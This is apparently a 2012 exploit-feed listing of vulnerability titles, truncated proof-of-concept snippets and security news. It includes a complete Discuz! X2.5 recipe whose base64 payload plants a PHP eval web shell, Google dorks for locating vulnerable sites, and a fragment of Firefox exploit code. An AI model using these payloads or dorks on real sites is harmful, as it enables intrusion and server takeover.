Discuz! X2.5 远程代码执行漏洞

No description provided by source. 1.注册任意账户 2.登陆用户，发表blog日志（注意是日志） 3.添加图片，选择网络图片，地址$fputsfopenbase64decodeZGVtby5waHA,w,base64decodePD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw 4.访问日志，论坛根目录下生成demo.php，一句话密码C...

eFront CMS 3.6.10 Information Disclosure

TITLE ....... eFront 3.6.10 CMS Information Disclosure bug DATE ........ 11.04.2012 public, after week or sth AUTOHR ...... http://hauntit.blogspot.com SOFT LINK ... http:// VERSION ..... 3.6.10 TESTED ON ... LAMP ----------------------------------------------------------------------- 1. What is...

HelpDen Cross Site Scripting

Exploit Title: HelpDen Cross Site Scripting Date: 15.04.2012 Author: Sony Software Link: http://www.helpden.com/ Google Dorks:inurl:.helpden.com/leavemessage.php?code Web Browser : Mozilla Firefox Blog : http://st2tea.blogspot.com PoC:...

Microsoft Office 2008 SP0 (Mac) - RTF pFragments

Microsoft Office 2008 SP0 Mac - RTF pFragments RTF Pfragments exploit for MAC office 2008 Author Abhishek Lyall - abhilyallatgmaildotcom, infoataslitsecuritydotcom Advanced Hacking Trainings - http://training.aslitsecurity.com Web - http://www.aslitsecurity.com/ Blog -...

Banking System Vulnerability - 3 million bank accounts hacked in Iran

Banking System Vulnerability - 3 million bank accounts hacked in Iran Iran's Central Bank has announced that the electronic information of 3 million customers of 10 Iranian banks have been compromised. These banks now require their customers to change their ATM pin numbers before they can access...

idev-Blog 1.0 Cross Site Request Forgery

Exploit Title: idev-Blog 1.0 CSRF Author: Jonturk75 Vendor or Software Link: http://idevspot.com/ Category:: webapps Demo : http://idevspot.com/demos/idev-blog/admin/ Greetz: Inj3ct0r Exploit DataBase 1337day.com...

idev-Blog 1.0 CSRF Vulnerability

Exploit for php platform in category web applications...

Validate.icq.com Cross Site Scripting

Date: 25.03.2012 Author: Sony and Flexxpoint Web Browser : Mozilla Firefox Sony Blog: http://st2tea.blogspot.com Flexxpoint Blog: http://flexxpoint.blogspot.com/ .................................................................. Good Place for XSS...

vBulletin vBShout 6.0.5 Cross Site Scripting

Title: vBulletin vBShout Module &username=&hours=&frommonth=0&fromday=&fromyear =0&endmonth=0&endday=&endyear=0&chatroomid=0&orderby=DESC&perpage=5&s=&do=archive&instanceid=1 http://www.site.com/vbshout.php?message="&s=&do=archive&instanceid=1 vBShout is the ideal way to keep members on your foru...

Z-BLOG V1.8 cmd.asp 跨站漏洞

No description provided by source...

Bo-Blog 2.1.0 go.php 文件包含漏洞

No description provided by source...

Volusion Chat Cross Site Scripting

Exploit Title: Volusion Chat Cross Site Scripting Date: 15.03.2012 Author: Sony Software Link: http://www.volusion.com/ Google Dorks: inurl:livechat.aspx?ID= intext:volusion or intext:powered by volusion Web Browser : Mozilla Firefox Blog : http://st2tea.blogspot.com PoC:...

NTG Haber Yazilim 1 SQL Injection

Exploit Title; NTG Haber Yazilim v1 - SQL Injection Vulnerability Date ; 14/03/12 Author ; 3spi0n Script Vendor ; www.netgenel.net/index/1/ntg-haber-yazilimi-v1.html Script Demo ; http://www.netgenel.net/v1/anasayfa.php Category ; Webapps Type ; Sql Injection Tested on ; Ubuntu / Win7 Script...

Pop star KE$HA twitter Hacked

Pop star KE$HA twitter Hacked Pop star KE$HA has fallen victim to internet pranksters after her Twitter.com blog was hacked on Sunday. Tweet by her account : Single out in a couple hours. Ugh so fkin stressful… wish I could stay on da the beach forever." It was potentially seen by Kesha's 3.1...

Adobe Flash Player MP4 'cprt' Overflow

This module exploits a vulnerability found in Adobe Flash Player. By supplying a corrupt .mp4 file loaded by Flash, it is possible to gain arbitrary remote code execution under the context of the user. This vulnerability has been exploited in the wild as part of the "Iran's Oil and Nuclear...

Google Releases Chrome 17.0.963.65

Google has released Chrome 17.0.963.65 for Linux, Macintosh, Windows, and Google Chrome Frame to address multiple vulnerabilities. These vulnerabilities may allow an attacker to execute arbitrary code or cause a denial-of-service condition. US-CERT encourages users and administrators to review th...

EditMe Cross Site Scripting

Exploit Title: EditMe Cross Site Scripting Date: 4.03.2012 Author: Sony Software Link: http://www.editme.com/ Web Browser : Mozilla Firefox Blog : http://st2tea.blogspot.com PoC: http://st2tea.blogspot.com/2012/03/editme-cross-site-scripting.html...

[SECURITY] [DSA 2423-1] movabletype-opensource security update

------------------------------------------------------------------------- Debian Security Advisory DSA-2423-1 [email protected] http://www.debian.org/security/ Florian Weimer March 02, 2012 http://www.debian.org/security/faq -...

Livejournal.com Cross Site Scripting

Exploit Title: Livejournal.com Cross Site Scripting Date: 27.02.2012 Author: Sony Software Link: http://www.livejournal.com/ Web Browser : Mozilla Firefox Blog : http://st2tea.blogspot.com PoC: http://st2tea.blogspot.com/2012/02/livejournalcom-cross-site-scripting.html...

Mozilla Firefox 4.0.1 Integer Overflow

function hexx var y = x.toString16; y = "0x"+y; return y; function itoai return String.fromCharCodei; // n - length in bytes 1 unicode char = 2 bytes function puffx, n whilex.length n x += x; return x.substring0,n; function arr2hextab var s = ""; forvar i in tab x = tabi; x = x.toString16;...